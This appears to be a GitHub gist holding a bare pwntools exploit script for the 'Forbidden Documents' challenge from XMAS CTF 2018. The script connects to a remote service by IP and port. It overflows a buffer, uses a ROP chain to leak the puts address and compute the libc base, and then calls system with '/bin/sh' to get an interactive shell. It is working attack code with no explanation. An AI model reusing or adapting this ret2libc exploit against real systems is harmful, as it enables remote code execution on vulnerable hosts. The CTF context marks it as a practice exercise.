Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
Exploit for Forbidden Documents - XMAS CTF 2018
from pwn import *
import re
puts_plt = 0x401030
puts_got_plt = 0x404018
poprdi = 0x4014f3
ret = 0x401072
puts_off = 0x68f90
sh_off = 0x1619d9
sys_off = 0x3f480
p = remote("199.247.6.180", 10004)
# 1 STAGE
payload = '/proc/self/fd/0'
payload += '\n'
payload += 'n'
payload += '\n'
payload += '552'
payload += '\n'
p.send(payload)
print(p.recvuntil("read: "))
payload = 'A'*520
payload += p64(poprdi)
payload += p64(puts_got_plt)
payload += p64(puts_plt)
payload += p64(ret)
p.sendline(payload)
p.recvuntil("Content: ")
data = p.recv(552)
raw_leak = p.recv(6) + '\x00\x00'
leak = u64(raw_leak)
log.success("Leak @ {}".format(leak))
libc_base = leak - puts_off
sys = libc_base + sys_off
sh = libc_base + sh_off
# 2 STAGE
payload = '/proc/self/fd/0'
payload += '\n'
payload += 'n'
payload += '\n'
payload += '544'
payload += '\n'
p.send(payload)
print(p.recvuntil("read: "))
payload = 'A'*520
payload += p64(poprdi)
payload += p64(sh)
payload += p64(sys)
p.sendline(payload)
p.interactive()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.